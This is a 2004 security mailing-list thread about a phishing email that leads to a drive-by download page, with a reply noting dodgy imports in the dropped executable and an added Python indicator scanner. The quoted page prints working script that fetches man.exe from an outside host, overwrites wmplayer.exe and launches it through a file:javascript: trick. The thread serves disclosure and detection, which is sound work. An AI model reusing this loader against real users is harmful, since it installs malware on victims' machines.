From: venom at gen-x.co.nz (VeNoMouS)
Subject: Old Hack?

if you look at the symbols from that exe, they look dodgy.

RegQueryValueExA
ShellExecuteA
4FtpPutFileA

also appears to have a base64 payload inside it. and i only used strings for
that, it's too hot to do any real work ..


----- Original Message ----- 
From: "axid3j1al axid3j1al" <axid3j1al@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Tuesday, February 03, 2004 4:40 PM
Subject: [Full-Disclosure] Old Hack?


> Has anyone seen this little code injection hack?
>
> Is this old?
>
>
> Email has subject line "congranulations! you won $1169"
>
> with body
>
> http://sinaraevent.com/bbs/zipcode/6.htm
>
>
> and code
>
> <textarea id="code" style="display:none;">
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0);
> x.Send();
>
> var s = new ActiveXObject("ADODB.Stream");
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
>
> s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
> location.href = "mms://";
>
> </textarea>
>
> <script language="javascript">
>
> function preparecode(code) {
> result = '';
> lines = code.split(/\r\n/);
> for (i=0;i<lines.length;i++) {
>
> line = lines[i];
> line = line.replace(/^\s+/,"");
> line = line.replace(/\s+$/,"");
> line = line.replace(/'/g,"\\'");
> line = line.replace(/[\\]/g,"\\\\");
> line = line.replace(/[/]/g,"%2f");
>
> if (line != '') {
> result += line +'\\r\\n';
> }
> }
> return result;
> }
>
> function doit() {
> mycode = preparecode(document.all.code.value);
> myURL = "file:javascript:eval('" + mycode + "')";
> window.open(myURL,"_media")
> }
>
>
> window.open("error.jsp","_media");
>
> setTimeout("doit()", 5000);
>
>
> </script>
>
> braindwish has expired
>
>
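
The indicators visible in the quoted page (an XMLHTTP object paired with ADODB.Stream, SaveToFile to an executable path, a hidden textarea holding script, and a file:javascript: URL) can be checked statically. The Python below is an added example, not part of either post; the rule names, the placeholder host and the sample text are constructed for illustration.

```python
import re

# Patterns taken from the page quoted above; rule names are made up for this example.
PROGID = re.compile(r'new\s+ActiveXObject\(\s*["\']([^"\']+)["\']', re.I)
SAVE = re.compile(r'\.SaveToFile\(\s*["\']([^"\']+)["\']', re.I)
HIDDEN_TEXTAREA = re.compile(r'<textarea[^>]*display\s*:\s*none', re.I)
SCRIPT_URL = re.compile(r'file:javascript:', re.I)
EXECUTABLE = re.compile(r'\.(exe|scr|com|pif|bat|cmd|dll)$', re.I)


def scan_page(html):
    """Return {rule name: evidence} for every indicator found in html."""
    hits = {}
    progids = {p.lower() for p in PROGID.findall(html)}
    fetch = {p for p in progids if p.endswith("xmlhttp")}
    if fetch and "adodb.stream" in progids:
        hits["activex-fetch-and-stream"] = sorted(fetch | {"adodb.stream"})
    # JavaScript source doubles backslashes; undo that for reporting.
    targets = [t.replace("\\\\", "\\") for t in SAVE.findall(html)]
    exe_targets = [t for t in targets if EXECUTABLE.search(t)]
    if exe_targets:
        hits["writes-executable-to-disk"] = exe_targets
    if HIDDEN_TEXTAREA.search(html):
        hits["hidden-textarea-code"] = True
    if SCRIPT_URL.search(html):
        hits["file-javascript-url"] = True
    return hits


# Constructed sample modelled on the quoted page (placeholder host, not the real one).
SAMPLE = r'''
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://example.invalid/man.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
</textarea>
<script>
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
</script>
'''
BENIGN = '<textarea id="msg"></textarea><script>var x = new XMLHttpRequest();</script>'

if __name__ == "__main__":
    for rule, evidence in scan_page(SAMPLE).items():
        print(rule, evidence)
```

A page that trips all four rules at once, as the constructed sample does, is a stronger signal than any single rule, since ActiveX XMLHTTP on its own was common in legitimate pages of that era.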

